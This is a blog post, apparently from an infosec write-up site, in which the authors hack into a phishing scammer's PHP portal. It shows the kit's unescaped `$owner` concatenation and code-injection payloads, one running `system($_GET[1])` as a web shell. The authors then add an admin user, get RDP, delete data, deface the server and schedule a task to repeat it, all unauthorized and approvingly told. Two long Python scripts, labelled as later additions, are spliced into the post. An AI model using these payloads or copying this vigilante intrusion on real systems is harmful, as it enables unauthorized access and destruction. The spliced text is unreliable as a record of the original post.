Destroying The Scammers Portal

Shashwat Kumar
Published in InfoSec Write-ups
4 min read · Nov 8, 2022

Greetings to all readers,

This is the continuation of our previous story, Hacking Into Scammers Portal, in which we hacked into the scammers' portal.

Introduction

As mentioned in the previous article, our friend Sri received a message about an Income Tax Refund claiming that his income tax had been miscalculated and that, to receive the refund, he should follow a link and install an application.

So we did some pentesting on the website and found a ‘Local File Disclosure’ (LFD) vulnerability through which we were able to get access to their database.

We deleted the database and left a message telling them to stop, but the scammers didn’t stop; they continued to scam people and steal data through the site.

The Final Chapter

So, this time we thought: why not teach this scammer a lesson?

We continued to pentest the application and came across the phishing pages hosted by the scammer.

The phishing page asks the victim for their personal data along with bank details, including the ATM PIN and net banking credentials.

The links redirected from Refund/xxx.php to a random directory and file.

We read the PHP file through the LFD and found that it creates a random directory and copies the contents of the phishing page into it.
Once the victim enters their details, the data is stored in the database and the directory is deleted.

Even if no details are entered, the files are removed after some time by comparing the previously recorded time in robo.txt and roboretired.txt.
So the phishing page is only active temporarily, and as soon as its work is done the directory is deleted, leaving no sign of phishing.

This makes it hard for crawlers and detection mechanisms to detect that this server is being used for phishing attacks.
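The ephemeral directory defeats URL crawlers, but the web server’s own access log still records every step: the bounce from the entry page, the visit to the random directory, the form POST, and the 404s once the directory is gone. The following Python script is an added example, not code from the original post; it parses constructed Apache-style log lines (the paths, directory name and addresses are made up) and flags paths that accepted a successful POST and later vanished, and pairs each 302 entry point with the directory the same client landed in next.

```python
import re
from datetime import datetime

# Constructed Apache combined-format lines (not from the original post):
# a visitor is bounced from the advertised entry page into a randomly named
# directory, submits the form, and the directory is gone by the next visit.
SAMPLE_LOG = """\
203.0.113.10 - - [08/Nov/2022:10:00:01 +0000] "GET /Refund/start.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.10 - - [08/Nov/2022:10:00:02 +0000] "GET /q8f3kz2d/pg.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.10 - - [08/Nov/2022:10:03:15 +0000] "POST /q8f3kz2d/pg.php HTTP/1.1" 200 210 "-" "Mozilla/5.0"
198.51.100.7 - - [08/Nov/2022:10:30:00 +0000] "GET /q8f3kz2d/pg.php HTTP/1.1" 404 196 "-" "Mozilla/5.0"
198.51.100.7 - - [08/Nov/2022:10:30:05 +0000] "GET /index.php HTTP/1.1" 200 800 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)


def parse_line(line):
    """Return the fields we need from one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z"),
        "method": m.group("method"),
        "path": m.group("path").split("?", 1)[0],   # drop the query string
        "status": int(m.group("status")),
    }


def find_ephemeral_pages(lines):
    """Map each path that accepted a POST (200) and later answered 404 to the
    seconds between its first 200 and that 404: pages that lived only long
    enough to collect a submission."""
    first_ok, posted, gone = {}, {}, {}
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        path = ev["path"]
        if ev["status"] == 200:
            first_ok.setdefault(path, ev["ts"])
            if ev["method"] == "POST":
                posted.setdefault(path, ev["ts"])
        elif ev["status"] == 404 and path in posted and path not in gone:
            gone[path] = ev["ts"]
    return {p: int((gone[p] - first_ok[p]).total_seconds()) for p in gone}


def top_dir(path):
    """First path component, used to tell the entry directory from the landing one."""
    return path.split("/")[1] if "/" in path else path


def redirect_chains(lines, window_seconds=10):
    """Pair each 302 entry point with the page the same client fetched next,
    when that page sits in a different top-level directory and was fetched
    within the window. Lines are assumed to be in time order."""
    pending = {}   # ip -> last 302 event not yet followed up
    chains = set()
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        if ev["status"] == 302:
            pending[ev["ip"]] = ev
            continue
        prev = pending.pop(ev["ip"], None)
        if (prev is not None and ev["status"] == 200
                and (ev["ts"] - prev["ts"]).total_seconds() <= window_seconds
                and top_dir(ev["path"]) != top_dir(prev["path"])):
            chains.add((prev["path"], ev["path"]))
    return chains


if __name__ == "__main__":
    lines = SAMPLE_LOG.splitlines()
    for entry, landing in sorted(redirect_chains(lines)):
        print(f"entry {entry} -> landing {landing}")
    for path, seconds in find_ephemeral_pages(lines).items():
        print(f"{path} took a submission and was gone {seconds}s after first appearing")
```

On a real host, point this at the server’s access log: a cluster of randomly named directories that each appear once, take one POST and then 404 is the signature of this kit even though none of those directories exist when the host is later inspected.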

The files were:

  • Configuration.php File
  • Logs Management File

From this page, the scammer manages and checks all the details fetched through phishing.

After looking at each file, I found a way to upload a shell.

Exploitation

The phishing PHP script had the following lines:

```php
// Assemble the page from the template pieces ($p1..$p6, $pg) and the
// request-supplied $owner value; $owner is dropped into a single-quoted
// PHP literal with no escaping at all.
$page = $p1.$p2.$p3.$p4.$pg.$p5."\n\$owner = '$owner';".$p6;
// Write the result out as pg.php inside the freshly created random directory.
$file1 = $absrand."/pg.php";
$fh = fopen($file1,"w") or die("Unable to open file!");
fwrite($fh,$page);
fclose($fh);

return $result;
```

Looking at the statement above, we see that, apart from all the txt files, it also creates a PHP file whose contents come from the parameters $p1 through $p6.

Luckily, a few of those parameters took their data directly from $_GET.
So I modified the parameter to put phpinfo() into the generated file.
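The root cause is that request parameters are concatenated straight into PHP source before the file is written, so a value containing a single quote closes the string literal and whatever follows becomes code. The following Python snippet is an added example, not code from the original post or from the kit: it mirrors the `$owner = '...'` concatenation with a Python assignment, uses the `ast` module to count how many statements the generated source really contains, and shows that serializing the value with `repr()` (the role `var_export()` plays in PHP) keeps it a single string literal. The crafted value is constructed for the demonstration and does nothing beyond adding a harmless assignment.

```python
import ast


def build_unsafe(owner):
    """Mirrors the kit: the request value lands inside a single-quoted
    literal by plain concatenation, with no escaping."""
    return "owner = '" + owner + "'\n"


def build_safe(owner):
    """Serialize the value with repr(), which escapes quotes and backslashes
    so the result can only ever be one string literal."""
    return "owner = " + repr(owner) + "\n"


def statements_in(source):
    """How many top-level statements the generated source really contains;
    the template intends exactly one assignment."""
    return len(ast.parse(source).body)


def injects_code(builder, value):
    """True when the value changed the structure of the generated program."""
    return statements_in(builder(value)) != 1


def assigned_owner(source):
    """The string the generated program actually assigns to `owner`."""
    for node in ast.parse(source).body:
        if (isinstance(node, ast.Assign)
                and isinstance(node.targets[0], ast.Name)
                and node.targets[0].id == "owner"):
            return node.value.value
    return None


# Constructed value: closes the literal, inserts a statement, then reopens a
# literal so the template's trailing quote still parses.
CRAFTED = "taz'; extra = 1; gg = '"

if __name__ == "__main__":
    for name, builder in (("unsafe", build_unsafe), ("safe", build_safe)):
        src = builder(CRAFTED)
        print(f"{name}: {statements_in(src)} statement(s), owner={assigned_owner(src)!r}")
```

The unsafe builder turns one intended assignment into three statements and truncates `owner` to `taz`; the safe builder keeps the whole value as data. The real fix, of course, is to never generate source files from request parameters at all.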

Payload — taz'; phpinfo();$gg='

This created a random directory containing a PHP file, and on accessing it we see the PHPINFO page.

To get a shell:

Payload — '%3b var_dump(system(%24_GET[1]))%3b%24gg='

Output

XAMPP was running as administrator, so it was easy to add a user and get RDP access.

Now, a few of the things we did:

  • Deleted all the phishing files and data.
  • Changed the administrator’s desktop background and the index page to display a message.
  • Created a scheduled task to repeat the above.
  • Reported everything to the hosting provider.
  • Card details are also being shared with the respective banks so that they can block the cards and take the necessary action.

Administrator Background

Anyone who opens the link from the received message will now see our message.

Credits —

Kunwar Atul (@kunwaratulhax0r)

Animesh Roy (@anir0y)

Sri Ram (@Sri_Hxor)

Shashwat Kumar (@rahullraz)

Happy Hacking 🧑🏻‍💻
